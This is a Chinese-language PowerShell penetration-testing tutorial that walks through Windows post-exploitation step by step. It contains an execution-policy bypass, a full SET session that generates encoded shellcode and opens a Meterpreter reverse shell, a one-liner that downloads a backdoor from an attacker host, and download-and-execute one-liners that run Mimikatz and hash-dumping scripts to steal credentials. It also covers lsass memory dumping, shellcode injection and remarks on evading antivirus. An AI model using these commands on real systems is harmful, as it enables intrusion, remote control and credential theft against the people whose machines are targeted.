Powershell猶如linux下的bash,并且在windows中Powershell可以利用.NET Framework的強大功能,也可以調用windows API,在win7/server 2008以后,powershell已被集成在系統當中。 Powershell強大的功能特性給windows管理帶來了極大的便利,同時也更加便于windows下的滲透測試。
Powershell腳本默認情況下無法雙擊或在cmd下執行。在執行時需要通過一些方法繞過該策略。 最簡單的方法就是執行powershell.exe附加需要執行的命令,也可以將要執行的腳本直接復制進powershell的窗口。 當然也可以Download and execute,如下面示例中一樣。
如果需要執行ps1文件時,也可以這樣:
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
不建議使用其他方法全局改變執行策略,如果場景不同可以根據參考自行選擇執行方式。
在遇到防護軟件時,可以使用powershell執行shellcode返回shell。執行腳本可以用msf生成,也可以用set工具包生成,注意的是msf生成的ps1文件,而set生成的是bat文件。 下面是在set中生成的過程:
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..SNIP...
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 10
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>1
set> IP address for the payload listener: 192.168.200.159
set:powershell> Enter the port for the reverse [443]:4444
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
..SNIP...
[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444
lport => 4444
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.200.158
[*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2 192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)
生成的文件在/root/.set/reports/powershell/下。 其中x86_powershell_injection.txt為bat文件,可以直接改名運行。 在這里有個技巧可以通過powershell一句話直接下載文件。
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.200.159/backdoor','backdoor.bat')
然后再執行就可以得到meterpreter會話了。
并且可以正常執行cmd命令、dump hash明文等操作。
當然在僅僅需要dump hash時,也可以借助powershell來完成。
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
同樣也可以用下面的方式(執行powershell版的Mimikatz)獲取明文。
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts
值得注意的是在這里也可以通過Command參數執行Mimikatz命令。
Powershell也可以完成像procdump一樣的工作,獲取某個進程的dumps。 這里演示獲取lsass.exe的dumps,然后再用Mimikatz從dumps中獲取明文。
然后將lsass dumps文件下載回來用Mimikatz分析可以得到明文密碼。
當然內存dumps不僅僅可以獲取windows密碼,往往進程內存中或許會儲存其他重要的信息或數據。參考http://blog.spiderlabs.com/2012/07/pentesting-like-an-eastern-european.html。
Powershell由于豐富的擴展功能使得其調用windows API非常方便,所以同樣也可以執行shellcode,這一過程如下:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode –help
但是在這里有個問題,就是x64下shellcode已有的很少,往往通過網上搜集的shellcode都是x86的。如果直接執行x86的shellcode則會出錯。
不過Invoke-Shellcode.ps1腳本默認是將shellcode注入在powershell.exe進程中,那么便可以用64位系統環境下32位的powershell.exe執行x86的shellcode,過程如下:
c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90 ...
并且這一過程適用于大部分msfpayload生成的shellcode。當然在windows下執行shellcode也可以用其它的方法,比如shellcodeexec。不過這個方法并不能bypass AV。但是大家可以根據源碼自行bypass。
未完待續。